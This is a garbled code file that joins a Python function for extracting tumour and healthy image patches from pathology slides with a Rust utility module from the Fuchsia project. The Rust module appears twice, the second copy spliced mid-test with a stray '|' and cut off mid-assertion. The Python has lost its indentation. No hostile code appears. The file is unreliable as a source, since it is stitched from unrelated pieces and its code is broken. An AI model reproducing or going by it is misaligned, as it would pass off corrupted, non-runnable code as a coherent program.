# read tumor mask
patch_mask = read_slide(tumor_mask,
x=new_x,
y=new_y,
level=lev,
width=patch_size,
height=patch_size)
# 1 channel is enough for the mask
patch_mask = patch_mask[:, :, 0]
# make tissue mask
tissue_pixels = find_tissue_pixels(patch_image)
patch_tissue = apply_mask(patch_image, tissue_pixels)
return patch_image, patch_mask, patch_tissue
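# Worked example (illustrative numbers): with patch_size = 299 and lev = 2 the downsample factor is
# 2 ** 2 = 4, so a requested centre of (x0, y0) = (10000, 8000) at level 0 gives
# new_x = 10000 - (299 // 2) * 4 = 10000 - 596 = 9404 and new_y = 8000 - 596 = 7404;
# read_region then starts at (9404, 7404) so that the 299x299 level-2 patch is centred on (x0, y0).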
def check_patch_centre(patch_mask, patch_centre):
""" Check if there is any tumor pixel in the 128x128 centre
inputs:
- patch_mask: array, tumor mask
        - patch_centre: int, usually 128
    outputs: Boolean
    """
    # get patch size
    patch_size = patch_mask.shape[0]
    # get the offset to check the 128x128 centre
    offset = int((patch_size - patch_centre) / 2)
    # sum the pixels in the 128x128 centre for the tumor mask
    sum_cancers = np.sum(patch_mask[offset:offset + patch_centre, offset:offset + patch_centre])
    return sum_cancers > 0
def collect_patches(tif, mask, lev1, lev2, num_per_img, patch_size, patch_centre, save_folder, num_random_sample):
    """ Extract patches with labels from the slides in the list
inputs:
        - tif: path to the slide .tif file
        - mask: path to the corresponding tumor mask .tif file
- lev1: int, target zoom level for the patches, between 0 and 7 - higher resolution: lev1<lev2
- lev2: int, target zoom level for the patches, between 0 and 7 - lower resolution
        - num_per_img: int, number of patches to extract per slide per class, usually 100
- patch_size: int, usually 299
- patch_centre: int, usually 128
        - save_folder: path of the CSV file to write the patch table to
    outputs:
        - table: pandas DataFrame with columns ['slide_name', 'x', 'y', 'label'] (label: 0 - healthy, 1 - tumor),
          also written to save_folder as a CSV file
    """
table=pd.DataFrame(columns=['slide_name','x','y','label'])
# init output lists
patch_images_lev1 = []
patch_images_lev2 = []
patch_labels = []
num_cancer = 0
num_health = 0
# file paths
slide_path = tif
mask_path = mask
f_num = slide_path.split('/')[-1].split('.')[0]
    slide_name = os.path.splitext(os.path.basename(slide_path))[0]  # strip the .tif extension safely
# get images with OpenSlide
slide = open_slide(slide_path)
tumor_mask = open_slide(mask_path)
# read level 4 slide image and mask - for the purposes of getting healthy
# and tumor pixels
    # read the slide and mask; read_slide returns an array of shape (height, width, 3)  # 3: RGB
slide_image = read_slide(slide,
x=0,
y=0,
level=4,
width=tumor_mask.level_dimensions[4][0],
height=tumor_mask.level_dimensions[4][1])
mask_image = read_slide(tumor_mask,
x=0,
y=0,
level=4,
width=tumor_mask.level_dimensions[4][0],
height=tumor_mask.level_dimensions[4][1])
print('--------checking mask image shape after read slide', mask_image.shape)
print('--------checking slide_image shape after read slide', slide_image.shape)
mask_image = mask_image[:, :, 0]
# print ('--------checking mask image shape after mask_image[:, :, 0]', mask_image.siz)
# get a list of tumor pixels at level 4
mask_lev_4_cancer = np.nonzero(mask_image)
# print ('checking length of mask_lev_4_cancer', mask_lev_4_cancer)
# make a healthy tissue mask by subtracting tumor mask from tissue mask
tissue_pixels = find_tissue_pixels(slide_image)
# print ('---checking tissue_pixels ', tissue_pixels )
tissue_regions = apply_mask(slide_image, tissue_pixels)
# print ('------checking tissue_regions', tissue_regions)
mask_health = tissue_regions[:, :, 0] - mask_image
# print ('------checking mask_health = tissue_regions[:, :, 0] - mask_image-------', mask_health.shape)
mask_health = mask_health > 0
# print ('------checking mask_health = mask_health > 0---------', mask_health.shape)
mask_health = mask_health.astype('int')
# print ('------checking mask_health = mask_health.astypeint-------', mask_health.shape)
# get a list of healthy pixels at level 4
mask_lev_4_health = np.nonzero(mask_health)
# print ('------checking mask_lev_4_health----', len(mask_lev_4_health[0]))
# print()
# print('lenmask_lev_4_cancerpatch_size ** 2, lenmask_lev_4_health0patch_size ** 2:',
# len(mask_lev_4_cancer[0]) // (patch_size ** 2), len(mask_lev_4_health[0]) // (patch_size ** 2))
# -------------------------------------------------------------
if len(mask_lev_4_cancer[0]) != 0:
print('extracting tumor patches------')
#logging.info('extracting tumor patches')
# extract TUMOR patches
# get a random sample of tumor pixels
        # Note: used random.sample here rather than random.choice inside the while loop because of speed
random_sample = min(len(list(zip(mask_lev_4_cancer[1], mask_lev_4_cancer[0])))-1,num_random_sample)
sample_cancer = random.sample(list(zip(mask_lev_4_cancer[1], mask_lev_4_cancer[0])), random_sample)
c = 0
idx= 0
# continue until enough patches extracted
while num_cancer < num_per_img:
c += 1
if c == random_sample:
break
# print('-----checking-------c', c)
# if c % 10 == 0:
# print(c, end=', ')
# get the next pixel from the sample - coordinates at level4
(x4, y4) = sample_cancer[c]
# convert level 4 coordinates to level 0
x0 = x4 * (2 ** 4)
y0 = y4 * (2 ** 4)
# extract patches at lev1 CENTERED at that pixel
patch_image_lev1, patch_mask_lev1, patch_tissue_lev1 = \
get_patches(slide, tumor_mask, lev1, x0, y0, patch_size)
# calc tissue ratio in that patch
tissue_ratio = np.sum(patch_tissue_lev1[:, :, 0]) / (patch_size ** 2)
# double-check if the patch has tumor
has_cancer = check_patch_centre(patch_mask_lev1, patch_centre)
# if it has more than 50% tissue and has tumor
if (tissue_ratio > 0.5) & has_cancer:
# collect lev1 patch
num_cancer += 1
table.loc[idx]=(slide_name,x0,y0,1)
idx+=1
# -------------------------------------------------------------
# extract HEALTHY patches
# repeat the above for the healthy pixels
print('extracting normal patches------')
#logging.info('extracting normal patches')
# print()
# get a random sample of healthy pixels
random_sample = min(len(list(zip(mask_lev_4_health[1], mask_lev_4_health[0])))-1, num_random_sample)
sample_health = random.sample(list(zip(mask_lev_4_health[1], mask_lev_4_health[0])), random_sample)
# print('-------checking sample_health------', len(sample_health))
c = 0
# get healthy images
while num_health < num_per_img:
c += 1
if c == random_sample:
break
# if c % 10 == 0:
# print(c, end=', ')
# get the next pixel from the sample - coordinates at level 4
(x4, y4) = sample_health[c]
# convert level 4 coordinates to level 0
x0 = x4 * (2 ** 4)
y0 = y4 * (2 ** 4)
# extract patches at lev1 CENTERED at that pixel
patch_image_lev1, patch_mask_lev1, patch_tissue_lev1 = \
get_patches(slide, tumor_mask, lev1, x0, y0, patch_size)
# calc tissue ratio in that patch
tissue_ratio = np.sum(patch_tissue_lev1[:, :, 0]) / (patch_size ** 2)
# check if the patch has tumor
has_cancer = check_patch_centre(patch_mask_lev1, patch_centre)
        # if it has more than 50% tissue and doesn't have tumor in the 128x128 centre
if (tissue_ratio > 0.5) & (not has_cancer):
# collect lev1 patch
num_health += 1
table.loc[idx]=(slide_name,x0,y0,0)
idx+=1
table.to_csv(save_folder,header=True)
    return table
utils.rs
// Copyright 2020 The Fuchsia Authors. All rights reserved.
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.
/// Logs an error message if the passed in `result` is an error.
#[macro_export]
macro_rules! log_if_err {
($result:expr, $log_prefix:expr) => {
if let Err(e) = $result.as_ref() {
log::error!("{}: {}", $log_prefix, e);
}
};
}
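// A minimal usage sketch (illustrative only; `do_something_fallible` is an assumed placeholder
// function, not part of this crate):
//
//     let result: Result<(), anyhow::Error> = do_something_fallible();
//     log_if_err!(result, "ThermalPolicy operation failed");
//
// When `result` is an `Err`, this logs "ThermalPolicy operation failed: <error>"; otherwise it does
// nothing, and `result` is left untouched for the caller to use.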
/// Logs an error message if the provided `cond` evaluates to false. Also passes the same expression
/// and message into `debug_assert!`, which will panic if debug assertions are enabled.
#[macro_export]
macro_rules! log_if_false_and_debug_assert {
($cond:expr, $msg:expr) => {
if !($cond) {
log::error!($msg);
debug_assert!($cond, $msg);
}
};
($cond:expr, $fmt:expr, $($arg:tt)+) => {
if !($cond) {
log::error!($fmt, $($arg)+);
debug_assert!($cond, $fmt, $($arg)+);
}
};
}
#[cfg(test)]
mod log_err_with_debug_assert_tests {
use crate::log_if_false_and_debug_assert;
/// Tests that `log_if_false_and_debug_assert` panics for a false expression when debug
/// assertions are enabled.
#[test]
#[should_panic(expected = "this will panic")]
#[cfg(debug_assertions)]
fn test_debug_assert() {
log_if_false_and_debug_assert!(true, "this will not panic");
log_if_false_and_debug_assert!(false, "this will panic");
}
/// Tests that `log_if_false_and_debug_assert` does not panic for a false expression when debug
/// assertions are not enabled.
#[test]
#[cfg(not(debug_assertions))]
fn test_non_debug_assert() {
log_if_false_and_debug_assert!(true, "this will not panic");
log_if_false_and_debug_assert!(false, "this will not panic either");
}
}
/// Export the `connect_to_driver` function to be used throughout the crate.
pub use connect_to_driver::connect_to_driver;
mod connect_to_driver {
use anyhow::{format_err, Error};
use fidl::endpoints::Proxy as _;
use fidl_fuchsia_io::{NodeProxy, OPEN_RIGHT_READABLE, OPEN_RIGHT_WRITABLE};
/// Returns a NodeProxy opened at `path`. The path is guaranteed to exist before the connection
/// is opened.
    async fn connect_channel(path: &str) -> Result<NodeProxy, Error> {
        device_watcher::recursive_wait_and_open_node(
            &io_util::open_directory_in_namespace(
                "/dev",
                OPEN_RIGHT_READABLE | OPEN_RIGHT_WRITABLE,
            )?,
            path,
        )
        .await
    }
/// Connects to the driver at `path`, returning a proxy of the specified type. The path is
/// guaranteed to exist before the connection is opened.
///
/// TODO(fxbug.dev/81378): factor this function out to a common library
pub async fn connect_to_driver<T: fidl::endpoints::ProtocolMarker>(
path: &str,
) -> Result<T::Proxy, Error> {
match path.strip_prefix("/dev/") {
Some(path) => fidl::endpoints::ClientEnd::<T>::new(
connect_channel(path)
.await?
.into_channel()
.map_err(|_| format_err!("into_channel failed on NodeProxy"))?
.into_zx_channel(),
)
.into_proxy()
.map_err(Into::into),
None => Err(format_err!("Path must start with /dev/")),
}
}
#[cfg(test)]
mod tests {
use super::*;
use async_utils::PollExt as _;
use fidl::endpoints::{create_proxy, Proxy, ServerEnd};
use fidl_fuchsia_io::{
DirectoryMarker, NodeMarker, MODE_TYPE_DIRECTORY, OPEN_RIGHT_READABLE,
OPEN_RIGHT_WRITABLE,
};
use fuchsia_async as fasync;
use futures::TryStreamExt as _;
use std::sync::Arc;
use vfs::{
directory::entry::DirectoryEntry, directory::helper::DirectlyMutable,
execution_scope::ExecutionScope, file::vmo::read_only_static, pseudo_directory,
};
fn bind_to_dev(dir: Arc<dyn DirectoryEntry>) {
let (dir_proxy, dir_server) = create_proxy::<DirectoryMarker>().unwrap();
let scope = ExecutionScope::new();
dir.open(
scope,
OPEN_RIGHT_READABLE | OPEN_RIGHT_WRITABLE,
MODE_TYPE_DIRECTORY,
vfs::path::Path::dot(),
ServerEnd::new(dir_server.into_channel()),
);
let ns = fdio::Namespace::installed().unwrap();
ns.bind("/dev", dir_proxy.into_channel().unwrap().into_zx_channel()).unwrap();
}
/// Tests that `connect_to_driver` returns success for the valid existing path.
#[fasync::run_singlethreaded(test)]
async fn test_connect_to_driver_success() {
bind_to_dev(pseudo_directory! {
"class" => pseudo_directory!{
"thermal" => pseudo_directory! {
"000" => read_only_static("string beans")
}
}
});
connect_to_driver::<NodeMarker>("/dev/class/thermal/000").await.unwrap();
}
/// Tests that `connect_to_driver` doesn't return until the required path is added.
#[test]
fn test_connect_to_driver_late_add() {
let mut executor = fasync::TestExecutor::new().unwrap();
let thermal_dir = pseudo_directory! {
"000" => read_only_static("string cheese (cheddar)")
};
bind_to_dev(pseudo_directory! {
"class" => pseudo_directory!{
"thermal" => thermal_dir.clone()
}
});
let connect_future =
&mut Box::pin(connect_to_driver::<NodeMarker>("/dev/class/thermal/001"));
// The required path is initially not present
assert!(executor.run_until_stalled(connect_future).is_pending());
// Add the required path
thermal_dir.add_entry("001", read_only_static("string cheese (mozzarella)")).unwrap();
// Verify the wait future now returns successfully
assert!(executor.run_until_stalled(connect_future).unwrap().is_ok());
}
/// Tests that `connect_to_driver` correctly waits even if the required parent directory
/// does not yet exist.
#[test]
fn test_connect_to_driver_nonexistent_parent_dir() {
let mut executor = fasync::TestExecutor::new().unwrap();
bind_to_dev(pseudo_directory! {
"class" => pseudo_directory!{
"cpu" => pseudo_directory! {
"000" => read_only_static("shoestring fries")
}
}
});
assert!(executor
.run_until_stalled(&mut Box::pin(connect_to_driver::<NodeMarker>(
"/dev/class/thermal/000"
)))
.is_pending());
}
/// Tests that the proxy returned by `connect_to_driver` is usable for sending a FIDL
/// request.
#[fasync::run_singlethreaded(test)]
async fn test_connect_to_driver_gives_usable_proxy() {
use fidl_fuchsia_device as fdev;
// Create a pseudo directory with a fuchsia.device.Controller FIDL server hosted at
// class/fake_dev_controller and bind it to our /dev
bind_to_dev(pseudo_directory! {
"class" => pseudo_directory! {
"fake_dev_controller" => vfs::service::host(
move |mut stream: fdev::ControllerRequestStream| {
async move {
match stream.try_next().await.unwrap() {
Some(fdev::ControllerRequest::GetCurrentPerformanceState {
responder
}) => {
let _ = responder.send(8);
}
e => panic!("Unexpected request: {:?}", e),
}
}
}
)
}
});
// Connect to the driver and call GetCurrentPerformanceState on it
let result = crate::utils::connect_to_driver::<fdev::ControllerMarker>(
"/dev/class/fake_dev_controller",
)
.await
.expect("Failed to connect to driver")
.get_current_performance_state()
.await
.expect("get_current_performance_state FIDL failed");
// Verify we receive the expected result
assert_eq!(result, 8);
}
/// Verifies that invalid arguments are rejected while valid ones are accepted.
#[fasync::run_singlethreaded(test)]
async fn test_connect_to_driver_valid_path() {
bind_to_dev(pseudo_directory! {
"class" => pseudo_directory!{
"cpu" => pseudo_directory! {
"000" => read_only_static("stringtown population 1")
}
}
});
connect_to_driver::<NodeMarker>("/svc/fake_service").await.unwrap_err();
connect_to_driver::<NodeMarker>("/dev/class/cpu/000").await.unwrap();
}
}
}
/// The number of nanoseconds since the system was powered on.
pub fn get_current_timestamp() -> crate::types::Nanoseconds {
crate::types::Nanoseconds(fuchsia_async::Time::now().into_nanos())
}
use fidl_fuchsia_cobalt::HistogramBucket;
/// Convenient wrapper for creating and storing an integer histogram to use with Cobalt.
pub struct CobaltIntHistogram {
/// Underlying histogram data storage.
data: Vec<HistogramBucket>,
/// Number of data values that have been added to the histogram.
data_count: u32,
/// Histogram configuration parameters.
config: CobaltIntHistogramConfig,
}
/// Histogram configuration parameters used by CobaltIntHistogram.
pub struct CobaltIntHistogramConfig {
pub floor: i64,
pub num_buckets: u32,
pub step_size: u32,
}
impl CobaltIntHistogram {
/// Create a new CobaltIntHistogram.
pub fn new(config: CobaltIntHistogramConfig) -> Self {
Self { data: Self::new_vec(config.num_buckets), data_count: 0, config }
}
/// Create a new Vec<HistogramBucket> that represents the underlying histogram storage. Two
/// extra buckets are added for underflow and overflow.
fn new_vec(num_buckets: u32) -> Vec<HistogramBucket> {
(0..num_buckets + 2).map(|i| HistogramBucket { index: i, count: 0 }).collect()
}
/// Add a data value to the histogram.
pub fn add_data(&mut self, n: i64) {
// Add one to index to account for underflow bucket at index 0
let mut index = 1 + (n - self.config.floor) / self.config.step_size as i64;
// Clamp index to 0 and self.data.len() - 1, which Cobalt uses for underflow and overflow,
// respectively
index = num_traits::clamp(index, 0, self.data.len() as i64 - 1);
self.data[index as usize].count += 1;
self.data_count += 1;
}
/// Get the number of data elements that have been added to the histogram.
pub fn count(&self) -> u32 {
self.data_count
}
/// Clear the histogram.
pub fn clear(&mut self) {
self.data = Self::new_vec(self.config.num_buckets);
self.data_count = 0;
}
/// Get the underlying Vec<HistogramBucket> of the histogram.
pub fn get_data(&self) -> Vec<HistogramBucket> {
self.data.clone()
}
}
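// A minimal usage sketch (illustrative values): with floor = 0, step_size = 10 and num_buckets = 3
// the histogram holds five buckets [underflow | 0..10 | 10..20 | 20..30 | overflow]; adding the
// value 25 computes index = 1 + (25 - 0) / 10 = 3, so the bucket at index 3 is incremented.
//
//     let mut hist = CobaltIntHistogram::new(CobaltIntHistogramConfig {
//         floor: 0,
//         step_size: 10,
//         num_buckets: 3,
//     });
//     hist.add_data(25);
//     assert_eq!(hist.count(), 1);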
// Finds all of the node config files under the test package's "/config/data" directory. The node
// config files are identified by a suffix of "node_config.json". The function then calls the
// provided `test_config_file` function for each found config file, passing the JSON structure in as
// an argument. The function returns success if each call to `test_config_file` succeeds. Otherwise,
// the first error encountered is returned.
#[cfg(test)]
pub fn test_each_node_config_file(
test_config_file: impl Fn(&Vec<serde_json::Value>) -> Result<(), anyhow::Error>,
) -> Result<(), anyhow::Error> {
use anyhow::Context as _;
use serde_json as json;
use std::fs;
use std::fs::File;
use std::io::BufReader;
let config_files = fs::read_dir("/config/data")
.unwrap()
.filter(|f| f.as_ref().unwrap().file_name().to_str().unwrap().ends_with("node_config.json"))
.map(|f| {
let path = f.unwrap().path();
let file_path = path.to_str().unwrap().to_string();
let json = json::from_reader(BufReader::new(File::open(path).unwrap())).unwrap();
(file_path, json)
})
.collect::<Vec<_>>();
assert!(config_files.len() > 0, "No config files found");
for (file_path, config_file) in config_files {
test_config_file(&config_file).context(format!("Failed for file {}", file_path))?;
}
Ok(())
}
#[cfg(test)]
mod tests {
use super::*;
/// CobaltIntHistogram: tests that data added to the CobaltIntHistogram is correctly counted and
/// bucketed.
#[test]
fn test_cobalt_histogram_data() {
// Create the histogram and verify initial data count is 0
let mut hist = CobaltIntHistogram::new(CobaltIntHistogramConfig {
floor: 50,
step_size: 10,
num_buckets: 3,
});
assert_eq!(hist.count(), 0);
// Add some arbitrary values, making sure some do not land on the bucket boundary to further
// verify the bucketing logic
hist.add_data(50);
hist.add_data(65);
hist.add_data(75);
hist.add_data(79);
// Verify the values were counted and bucketed properly
assert_eq!(hist.count(), 4);
assert_eq!(
hist.get_data(),
vec![
HistogramBucket { index: 0, count: 0 }, // underflow
HistogramBucket { index: 1, count: 1 },
HistogramBucket { index: 2, count: 1 },
HistogramBucket { index: 3, count: 2 },
HistogramBucket { index: 4, count: 0 } // overflow
]
);
// Verify `clear` works as expected
hist.clear();
assert_eq!(hist.count(), 0);
assert_eq!(
hist.get_data(),
vec![
HistogramBucket { index: 0, count: 0 }, // underflow
HistogramBucket { index: 1, count: 0 },
HistogramBucket { index: 2, count: 0 },
HistogramBucket { index: 3, count: 0 },
HistogramBucket { index: 4, count: 0 }, // overflow
]
);
}
/// CobaltIntHistogram: tests that invalid data values are logged in the correct
/// underflow/overflow buckets.
#[test]
fn test_cobalt_histogram_invalid_data() {
let mut hist = CobaltIntHistogram::new(CobaltIntHistogramConfig {
floor: 0,
step_size: 1,
num_buckets: 2,
});
hist.add_data(-2);
hist.add_data(-1);
hist.add_data(0);
hist.add_data(1);
hist.add_data(2);
assert_eq!(
hist.get_data(),
vec![
HistogramBucket { index: 0, count: 2 }, // underflow
HistogramBucket { index: 1, count: 1 },
HistogramBucket { index: 2, count: 1 },
HistogramBucket { index: 3, count: 1 } // overflow
]
);
}
/// Tests that the `get_current_timestamp` function returns the expected current timestamp.
#[test]
fn test_get_current_timestamp() {
use crate::types::Nanoseconds;
let exec = fuchsia_async::TestExecutor::new_with_fake_time().unwrap();
exec.set_fake_time(fuchsia_async::Time::from_nanos(0));
assert_eq!(get_current_timestamp(), Nanoseconds(0));
exec.set_fake_time(fuchsia_async::Time::from_nanos(1000));
assert_eq!(get_current_timestamp(), Nanoseconds(1000));
}
}
utils.rs
// Copyright 2020 The Fuchsia Authors. All rights reserved.
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.
/// Logs an error message if the passed in `result` is an error.
#[macro_export]
macro_rules! log_if_err {
($result:expr, $log_prefix:expr) => {
if let Err(e) = $result.as_ref() {
log::error!("{}: {}", $log_prefix, e);
}
};
}
/// Logs an error message if the provided `cond` evaluates to false. Also passes the same expression
/// and message into `debug_assert!`, which will panic if debug assertions are enabled.
#[macro_export]
macro_rules! log_if_false_and_debug_assert {
($cond:expr, $msg:expr) => {
if !($cond) {
log::error!($msg);
debug_assert!($cond, $msg);
}
};
($cond:expr, $fmt:expr, $($arg:tt)+) => {
if !($cond) {
log::error!($fmt, $($arg)+);
debug_assert!($cond, $fmt, $($arg)+);
}
};
}
#[cfg(test)]
mod log_err_with_debug_assert_tests {
use crate::log_if_false_and_debug_assert;
/// Tests that `log_if_false_and_debug_assert` panics for a false expression when debug
/// assertions are enabled.
#[test]
#[should_panic(expected = "this will panic")]
#[cfg(debug_assertions)]
fn test_debug_assert() {
log_if_false_and_debug_assert!(true, "this will not panic");
log_if_false_and_debug_assert!(false, "this will panic");
}
/// Tests that `log_if_false_and_debug_assert` does not panic for a false expression when debug
/// assertions are not enabled.
#[test]
#[cfg(not(debug_assertions))]
fn test_non_debug_assert() {
log_if_false_and_debug_assert!(true, "this will not panic");
log_if_false_and_debug_assert!(false, "this will not panic either");
}
}
/// Export the `connect_to_driver` function to be used throughout the crate.
pub use connect_to_driver::connect_to_driver;
mod connect_to_driver {
use anyhow::{format_err, Error};
use fidl::endpoints::Proxy as _;
use fidl_fuchsia_io::{NodeProxy, OPEN_RIGHT_READABLE, OPEN_RIGHT_WRITABLE};
/// Returns a NodeProxy opened at `path`. The path is guaranteed to exist before the connection
/// is opened.
async fn connect_channel(path: &str) -> Result<NodeProxy, Error> {
device_watcher::recursive_wait_and_open_node(
&io_util::open_directory_in_namespace(
"/dev",
OPEN_RIGHT_READABLE | OPEN_RIGHT_WRITABLE,
)?,
path,
)
.await
}
/// Connects to the driver at `path`, returning a proxy of the specified type. The path is
/// guaranteed to exist before the connection is opened.
///
/// TODO(fxbug.dev/81378): factor this function out to a common library
pub async fn connect_to_driver<T: fidl::endpoints::ProtocolMarker>(
path: &str,
) -> Result<T::Proxy, Error> {
match path.strip_prefix("/dev/") {
Some(path) => fidl::endpoints::ClientEnd::<T>::new(
connect_channel(path)
.await?
.into_channel()
.map_err(|_| format_err!("into_channel failed on NodeProxy"))?
.into_zx_channel(),
)
.into_proxy()
.map_err(Into::into),
None => Err(format_err!("Path must start with /dev/")),
}
}
#[cfg(test)]
mod tests {
use super::*;
use async_utils::PollExt as _;
use fidl::endpoints::{create_proxy, Proxy, ServerEnd};
use fidl_fuchsia_io::{
DirectoryMarker, NodeMarker, MODE_TYPE_DIRECTORY, OPEN_RIGHT_READABLE,
OPEN_RIGHT_WRITABLE,
};
use fuchsia_async as fasync;
use futures::TryStreamExt as _;
use std::sync::Arc;
use vfs::{
directory::entry::DirectoryEntry, directory::helper::DirectlyMutable,
execution_scope::ExecutionScope, file::vmo::read_only_static, pseudo_directory,
};
fn bind_to_dev(dir: Arc<dyn DirectoryEntry>) {
let (dir_proxy, dir_server) = create_proxy::<DirectoryMarker>().unwrap();
let scope = ExecutionScope::new();
dir.open(
scope,
OPEN_RIGHT_READABLE | OPEN_RIGHT_WRITABLE,
MODE_TYPE_DIRECTORY,
vfs::path::Path::dot(),
ServerEnd::new(dir_server.into_channel()),
);
let ns = fdio::Namespace::installed().unwrap();
ns.bind("/dev", dir_proxy.into_channel().unwrap().into_zx_channel()).unwrap();
}
/// Tests that `connect_to_driver` returns success for the valid existing path.
#[fasync::run_singlethreaded(test)]
async fn test_connect_to_driver_success() {
bind_to_dev(pseudo_directory! {
"class" => pseudo_directory!{
"thermal" => pseudo_directory! {
"000" => read_only_static("string beans")
}
}
});
connect_to_driver::<NodeMarker>("/dev/class/thermal/000").await.unwrap();
}
/// Tests that `connect_to_driver` doesn't return until the required path is added.
#[test]
fn test_connect_to_driver_late_add() {
let mut executor = fasync::TestExecutor::new().unwrap();
let thermal_dir = pseudo_directory! {
"000" => read_only_static("string cheese (cheddar)")
};
bind_to_dev(pseudo_directory! {
"class" => pseudo_directory!{
"thermal" => thermal_dir.clone()
}
});
let connect_future =
&mut Box::pin(connect_to_driver::<NodeMarker>("/dev/class/thermal/001"));
// The required path is initially not present
assert!(executor.run_until_stalled(connect_future).is_pending());
// Add the required path
thermal_dir.add_entry("001", read_only_static("string cheese (mozzarella)")).unwrap();
// Verify the wait future now returns successfully
assert!(executor.run_until_stalled(connect_future).unwrap().is_ok());
}
/// Tests that `connect_to_driver` correctly waits even if the required parent directory
/// does not yet exist.
#[test]
fn test_connect_to_driver_nonexistent_parent_dir() {
let mut executor = fasync::TestExecutor::new().unwrap();
bind_to_dev(pseudo_directory! {
"class" => pseudo_directory!{
"cpu" => pseudo_directory! {
"000" => read_only_static("shoestring fries")
}
}
});
assert!(executor
.run_until_stalled(&mut Box::pin(connect_to_driver::<NodeMarker>(
"/dev/class/thermal/000"
)))
.is_pending());
}
/// Tests that the proxy returned by `connect_to_driver` is usable for sending a FIDL
/// request.
#[fasync::run_singlethreaded(test)]
async fn test_connect_to_driver_gives_usable_proxy() {
use fidl_fuchsia_device as fdev;
// Create a pseudo directory with a fuchsia.device.Controller FIDL server hosted at
// class/fake_dev_controller and bind it to our /dev
bind_to_dev(pseudo_directory! {
"class" => pseudo_directory! {
"fake_dev_controller" => vfs::service::host(
move |mut stream: fdev::ControllerRequestStream| {
async move {
match stream.try_next().await.unwrap() {
Some(fdev::ControllerRequest::GetCurrentPerformanceState {
responder
}) => {
let _ = responder.send(8);
}
e => panic!("Unexpected request: {:?}", e),
}
}
}
)
}
});
// Connect to the driver and call GetCurrentPerformanceState on it
let result = crate::utils::connect_to_driver::<fdev::ControllerMarker>(
"/dev/class/fake_dev_controller",
)
.await
.expect("Failed to connect to driver")
.get_current_performance_state()
.await
.expect("get_current_performance_state FIDL failed");
// Verify we receive the expected result
assert_eq!(result, 8);
}
/// Verifies that invalid arguments are rejected while valid ones are accepted.
#[fasync::run_singlethreaded(test)]
async fn test_connect_to_driver_valid_path() {
bind_to_dev(pseudo_directory! {
"class" => pseudo_directory!{
"cpu" => pseudo_directory! {
"000" => read_only_static("stringtown population 1")
}
}
});
connect_to_driver::<NodeMarker>("/svc/fake_service").await.unwrap_err();
connect_to_driver::<NodeMarker>("/dev/class/cpu/000").await.unwrap();
}
}
}
/// The number of nanoseconds since the system was powered on.
pub fn get_current_timestamp() -> crate::types::Nanoseconds {
crate::types::Nanoseconds(fuchsia_async::Time::now().into_nanos())
}
use fidl_fuchsia_cobalt::HistogramBucket;
/// Convenient wrapper for creating and storing an integer histogram to use with Cobalt.
pub struct CobaltIntHistogram {
/// Underlying histogram data storage.
data: Vec<HistogramBucket>,
/// Number of data values that have been added to the histogram.
data_count: u32,
/// Histogram configuration parameters.
config: CobaltIntHistogramConfig,
}
/// Histogram configuration parameters used by CobaltIntHistogram.
pub struct CobaltIntHistogramConfig {
pub floor: i64,
pub num_buckets: u32,
pub step_size: u32,
}
impl CobaltIntHistogram {
/// Create a new CobaltIntHistogram.
pub fn new(config: CobaltIntHistogramConfig) -> Self {
Self { data: Self::new_vec(config.num_buckets), data_count: 0, config }
}
/// Create a new Vec<HistogramBucket> that represents the underlying histogram storage. Two
/// extra buckets are added for underflow and overflow.
fn new_vec(num_buckets: u32) -> Vec<HistogramBucket> {
(0..num_buckets + 2).map(|i| HistogramBucket { index: i, count: 0 }).collect()
}
/// Add a data value to the histogram.
pub fn add_data(&mut self, n: i64) {
// Add one to index to account for underflow bucket at index 0
let mut index = 1 + (n - self.config.floor) / self.config.step_size as i64;
// Clamp index to 0 and self.data.len() - 1, which Cobalt uses for underflow and overflow,
// respectively
index = num_traits::clamp(index, 0, self.data.len() as i64 - 1);
self.data[index as usize].count += 1;
self.data_count += 1;
}
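    // Worked example (illustrative, not from the original source): with floor = 50,
    // step_size = 10 and num_buckets = 3, a sample of 65 maps to index = 1 + (65 - 50) / 10 = 2,
    // the second "real" bucket; 30 maps to 1 + (30 - 50) / 10 = -1 and clamps to 0 (underflow);
    // 1_000 clamps to num_buckets + 1 = 4 (overflow).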
/// Get the number of data elements that have been added to the histogram.
pub fn count(&self) -> u32 {
self.data_count
}
/// Clear the histogram.
pub fn clear(&mut self) {
self.data = Self::new_vec(self.config.num_buckets);
self.data_count = 0;
}
/// Get the underlying Vec<HistogramBucket> of the histogram.
pub fn get_data(&self) -> Vec<HistogramBucket> {
self.data.clone()
}
}
// Finds all of the node config files under the test package's "/config/data" directory. The node
// config files are identified by a suffix of "node_config.json". The function then calls the
// provided `test_config_file` function for each found config file, passing the JSON structure in as
// an argument. The function returns success if each call to `test_config_file` succeeds. Otherwise,
// the first error encountered is returned.
#[cfg(test)]
pub fn test_each_node_config_file(
test_config_file: impl Fn(&Vec<serde_json::Value>) -> Result<(), anyhow::Error>,
) -> Result<(), anyhow::Error> {
use anyhow::Context as _;
use serde_json as json;
use std::fs;
use std::fs::File;
use std::io::BufReader;
let config_files = fs::read_dir("/config/data")
.unwrap()
.filter(|f| f.as_ref().unwrap().file_name().to_str().unwrap().ends_with("node_config.json"))
.map(|f| {
let path = f.unwrap().path();
let file_path = path.to_str().unwrap().to_string();
let json = json::from_reader(BufReader::new(File::open(path).unwrap())).unwrap();
(file_path, json)
})
.collect::<Vec<_>>();
assert!(config_files.len() > 0, "No config files found");
for (file_path, config_file) in config_files {
test_config_file(&config_file).context(format!("Failed for file {}", file_path))?;
}
Ok(())
}
#[cfg(test)]
mod tests {
use super::*;
/// CobaltIntHistogram: tests that data added to the CobaltIntHistogram is correctly counted and
/// bucketed.
#[test]
fn test_cobalt_histogram_data() {
// Create the histogram and verify initial data count is 0
let mut hist = CobaltIntHistogram::new(CobaltIntHistogramConfig {
floor: 50,
step_size: 10,
num_buckets: 3,
});
assert_eq!(hist.count(), 0); | // verify the bucketing logic
hist.add_data(50);
hist.add_data(65);
hist.add_data(75);
hist.add_data(79);
// Verify the values were counted and bucketed properly
assert_eq!(hist.count(), 4);
assert_eq!(
hist.get_data(),
vec![
HistogramBucket { index: 0, count: 0 }, // underflow
HistogramBucket { index: 1, count: 1 },
HistogramBucket { index: 2, count: 1 },
HistogramBucket { index: 3, count: 2 },
HistogramBucket { index: 4, count: 0 } // overflow
]
);
// Verify `clear` works as expected
hist.clear();
assert_eq!(hist.count(), 0);
assert_eq!(
hist.get_data(),
vec![
HistogramBucket { index: 0, count: 0 }, // underflow
